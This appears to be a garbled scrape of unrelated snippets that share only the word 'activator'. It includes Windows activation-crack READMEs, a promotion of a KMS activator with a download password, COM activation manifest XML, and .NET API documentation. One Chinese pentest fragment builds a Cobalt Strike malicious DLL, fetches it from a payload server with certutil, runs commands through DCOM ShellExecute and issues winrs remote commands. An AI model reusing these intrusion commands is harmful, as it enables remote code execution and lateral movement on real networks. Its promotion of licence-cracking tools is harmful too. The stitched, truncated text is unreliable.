Windows-Activator.vcxproj.filters index.html logo.svg resource.h README MIT license Windows Activator Activate all editions of Windows 8, 8.1, 10 and 11 free of cost A simple easy to use tool to activate any edition of Microsoft Windows 8 to 11 without buying license key. ...
This is a windows 10 activator idk if it works on 11 it will 'crack' your windows installtion and give you a life time but if it didnt sorry some version just give 180 days you could always re use the script windows windows-batch-script windows-activation activation-without-key activate-...
--Specify which CLSID to activate when notification is clicked--><desktop:ExtensionCategory="windows.toastNotificationActivation"><desktop:ToastNotificationActivationToastActivatorCLSID="replaced-with-your-guid-C173E6ADF0C3"/></desktop:Extension><!--Register COM CLSID--><com...
: 这款真心推荐,是真的好用。使用方法简单粗暴...
--Register COM activator--><com:ExtensionCategory="windows.comServer"><com:ComServer><com:ExeServerExecutable="SampleApp\SampleApp.exe"DisplayName="SampleApp"Arguments="---WindowsAppRuntimePushServer:"><com:ClassId="[Your app's Azure AppId]"DisplayName="Windows App SDK Push"/></com:ExeServer...
void _Activator.GetIDsOfNames (ref Guid riid, IntPtr rgszNames, uint cNames, uint lcid, IntPtr rgDispId); 參數 riid Guid 保留供未來使用。 必須是 IID_NULL。 rgszNames IntPtr 要對應的傳入名稱陣列。 cNames UInt32 要對應的名稱計數。 lcid UInt32 用於解...
上面的方式,算是傻瓜式的操作了,基本不存在不能激活的版本】 获取方式 地址1(蓝奏云):密码:9xum (里面有历史版本的HUE KMS,挺全的) 地址2(GitHub): (地址2是需要科学的,不然访问慢)...
Create a new instance of a scheduled job with a given jobDescriptor within the provided dependencyScope. cobalt strike生成一个恶意的dll(不讨论免杀)并放在我们的playload下发服务器中 加载我们的利用脚本,可以远程加载。这里演示本地加载; param($path,$u,$filename) certutil.exe -urlcache -split -f$u$path$filename$excel= [activator]::CreateInstance([type...
$obj=[System.Activator]::CreateInstance($com) $obj.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0) i、WINRM winrs -r: -p:password “whoami” winrs -r:\administ...